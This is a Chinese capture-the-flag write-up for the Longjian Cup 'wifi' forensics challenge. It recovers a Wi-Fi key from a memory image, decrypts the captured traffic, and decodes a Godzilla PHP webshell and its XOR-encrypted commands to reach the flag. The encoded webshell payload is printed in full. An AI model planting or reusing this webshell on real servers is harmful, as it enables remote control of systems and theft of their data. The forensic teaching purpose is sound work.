首届“陇剑杯”网络安全大赛题目wifi详解
写文章只是为了记录自己的学习,不是粘贴复制就完事了
参考
https://www.cnblogs.com/GKLBB/p/15315725.html
https://www.nctry.com/2449.html
https://www.freebuf.com/sectool/285693.html
题目链接: https://pan.baidu.com/s/1H2iVCuntQuyIemELCDXl6w
提取码: c6pk
常规姿势
文件内容
用wireshake打开客户端.cap
发现流量被加密,但是依旧可以发现WiFi的名字是My_Wifi
要解密的话就需要wifi的密码
对windows而言,只要连过这个wifi,它的信息就会被保存,包括密码
查看连过的wifi
查看某个密码
这些东西都在一个xml文件里
知道了这些后我们就可以去镜像找xml文件了
因为没接触过取证用的volatility
又写了关于我在windows使用volatility取证这档事
扫描镜像里的文件把结果存到files.txt里
打开files.txt搜索.xml
得到四行结果
0x1e6d1530 \Windows\System32\tcpbidi.xml 128
0x3fcc5908 \Windows\System32\RacRules.xml 128
0x3fd0d390 \Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\5dd9f783008543df3e642ff1e99de4e8\System.Xml.ni.dll 128
0x3fd67bb0 \Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll 128
显然这不是我们想找的文件
此外我们还知道的信息是WiFi的名字是My_Wifi
搜索My_Wifi得到一行结果
0x3fdc38c8 \Program Files\My_Wifi.zip\Temp\vmware-admin\VMwareDnD\2a1221c7\My_Wifi.zip 128
先把这个文件dump下来看看
拖到Windows修改文件名为wifi.zip然后解压
题目说了压缩包里有密码的提示
网卡的guid就是密码
同时网卡的guid也是保存配置文件夹的名字
所以在files.txt里搜索Interfaces得到四行结果
0x1c7ec5c8 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A} 128
0x1f78f4b0 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces 128
0x3fa921c8 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A} 128
0x3fda8be8 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces 128
题目说了要加上花括号
所以解压密码就是{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}
打开里面的xml文件发现密码是233@114514_qwe
得到密码和ssid后对流量解密
选择protocols
找到IEEE 802.11
wifi包解密后
但是wifi这么多包,不确定哪些属于webshell的流量
这时候服务器的包就可以派上用场了
上传哥斯拉用的是POST
过滤POST数据包得到服务器IP:42.192.84.152
导出http对象
得到5个php文件
已知上传的是哥斯拉的马
看到%什么什么应该就知道这是url编码吧
所以首先拿去url解码
拿到php环境执行一下
echo base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD')));
得到上传的代码
可以看出使用的是php_xor_base64的加密器
如果看不出可以用哥斯拉生成对比一下使用的是什么加密器
接下来就是对哥斯拉的数据包解密了
说实话我也不会
所以又写了哥斯拉还原加密流量
看过哥斯拉流量分析后就很容易了
对于哥斯拉POST的数据包使用这个脚本解密
<?phpfunction encode($D,$K){for($i=0;$i<strlen($D);$i++){$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';echo encode(base64_decode(urldecode('xxxxxxx')),$key);
对于哥斯拉的返回包使用这个脚本解密
<?php
function encode($D,$K){for($i=0;$i<strlen($D);$i++){$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
// 原来的数据去掉前十六位和后十六位然后解密
echo gzdecode(encode(base64_decode(''),$key));
在POST里肯定没有什么我们想要的东西
所以返回到客户端.cap
筛选http的数据包
这里恰好都是源ip为42.192.84.152
如果有其它源ip不是42.192.84.152的就过滤掉
然后导出http对象
得到这么多文件
把css,js,png结尾的文件删掉
剩下这么多打开查看
发现只有四个是哥斯拉的返回包
利用上面的脚本开始解密
解密的时候要去掉头16位去掉尾16位
其中第一个包解密后为
第二个包解密
第三个包解密
第四个包解密得到flag
大佬的另一种姿势
当你没有解密脚本的时候
已知条件哥斯拉木马的源码
观察发现这个key就是默认的key
也就是key经过md5加密后前16位
验证猜想:用哥斯拉生成一个木马
发现两个是一样的
接下来把木马丢到虚拟机里
用phpstudy搭个环境
打开哥斯拉测试连接
开启burp代理添加
执行一个命令截断
最多四次就出来了,之前导出的http对象不是还剩这四个是格拉斯加密的包吗
这样干的好处就是不需要解密脚本了
首届“陇剑杯”网络安全大赛题目wifi详解相关推荐
- 首届“陇剑杯”网络安全大赛线上赛圆满结束
9月14日,集结了各行业领域3020支战队.11135名网络安全精英的首届"陇剑杯"网络安全大赛线上赛圆满结束,成功拉开将于9月25日在甘肃兰州新区举行的总决赛战幕.届时,涵盖网络 ...
- [2021首届“陇剑杯”网络安全大赛] webshell
[2021首届"陇剑杯"网络安全大赛] webshell 题目描述 单位网站被黑客挂马,请您从流量中分析出webshell,进行回答: 1.黑客登录系统使用的密码是___Admin ...
- [2021首届“陇剑杯”网络安全大赛 决赛]内存取证writeup
决赛不能联网-手上有只有vol2.6,这道题完全死了 文章目录 [2021首届"陇剑杯"网络安全大赛 决赛]内存取证 writeup 产品密钥 匿名邮箱 远控后门 数据清除时间 [ ...
- 首届“网刃杯”网络安全大赛部分WP
这是之前打比赛写的WP,供大家参考 藏在S7里的秘密 1.修复流量包 下载流量包打开后发现提示错报 The file"S7.pcap" isn't a capture file i ...
- 网络安全面试题目及详解
获取目标站点的绝对路径 如果是iis系统,尝试对参数进行恶意传值,使其出现报错页面 对目标网站进行js代码审计,查看是否存在信息泄露出站点的绝对路径 使用字典猜解目标站点的绝对路径 如果目标是thin ...
- [陇剑杯2021] 复现
签到 此时正在进行的可能是__________协议的网络攻击.(如有字母请全部使用小写,填写样例:http.dns.ftp) NSSCTF{http} jwt-1 昨天,单位流量系统捕获了黑客攻击流量 ...
- 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup
2020年第二届"网鼎杯"网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download ...
- 2021陇剑杯部分wp
2021陇剑杯 全是流量分析.麻了.只做了一部分. 参考链接 陇剑杯 个人 'WriteUp'-魔法少女雪殇 (snowywar.top) 陇剑杯Writeup(部分) - 惊觉 (leheaveng ...
- [ CTF ] WriteUp- 2022年第三届“网鼎杯”网络安全大赛(白虎组)
2022年第三届"网鼎杯"网络安全大赛(白虎组)部分题目附件 文章目录 [Misc]misc620 [Crypto]crypto582 [Crypto]crypto581 [Mis ...
最新文章
- Python之sklearn-pandas:sklearn-pandas库函数的简介、安装、使用方法之详细攻略
- 应届算法岗,选择巨头还是AI明星创业公司
- Markovs Chains采样
- java里面的 |运算符_Java 中 | ^ 运算符的简单使用
- 中序线索树和后序线索树
- python中mat函数_Python中flatten( )函数及函数用法详解
- 10分钟搞懂:亿级用户的分布式数据存储解决方案!
- 解决windows安装mongodb出现dbexit: rc:100错误
- AWS Ubuntu 18.04 镜像采用滚动内核模型
- 服务器系统性能计数器,MSRS 2008 Windows Service 性能对象的性能计数器
- nbu WIN平台下面(mtx/robtest/tar/nt_ttu)手动测试driver是否正常
- 今晚十点!鄂尔多斯将屏霸湖南卫视《天天向上》,美爆全国~
- 免费的Andr​​oid最好的视频播放器应用程序2012
- 斐讯k2路由虚拟服务器,斐讯K2T分离式无线路由器 新思路解决老问题(无线信号那些事)...
- 神舟笔记本电脑win10系统不能调节亮度问题
- xshell 导入.xsh 文件
- App逆向|一个案例教你如何进行APP逆向
- 关于FlashDB的应用-GD32F450上
- html表格 内容间距,html怎么设置表格间距
- 浅谈技术管理之团队管理